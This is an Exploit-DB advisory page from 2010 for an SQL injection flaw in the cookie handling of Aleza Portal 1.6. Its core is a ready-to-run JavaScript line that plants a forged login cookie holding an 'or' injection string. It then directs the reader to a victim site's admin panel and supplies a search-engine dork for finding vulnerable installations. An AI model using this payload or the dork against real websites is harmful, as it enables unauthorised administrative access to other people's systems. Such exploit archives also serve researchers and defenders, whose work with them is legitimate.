Aleza Portal 1.6 - Insecure SQL Injection / Cookie Handling

EDB-ID:

15144

CVE:

N/A


Author:

KnocKout

Type:

webapps


Platform:

Windows

Date:

2010-09-28


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

Aleza Portal v1.6 - Insecure (SQLi) Cookie Handling 
=========================================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout 
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Aleza Portal v1.6
~Software: http://www.webavail.com/
-Demo : http://www.webavail.com/alezademo/
~Vulnerability Style : (SQLi) Cookie Handling
~Google Keywords : Copyright 2001 WebAvail Productions, Inc. All Rights Reserved.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ~~~~~~~~ Explotation ~~~~~~~~~~~

    Browser Injection for handling() by Javascript-SQLi Codes
    ================================
    javascript:document.cookie="alezalogin=login='or'level=11&pass='or';path=/";
    ================================
          [+]  Exploitable Browser Injected!

          [+]   Go to : http://[Victim]/admin
          
      
      GoodLucK ;)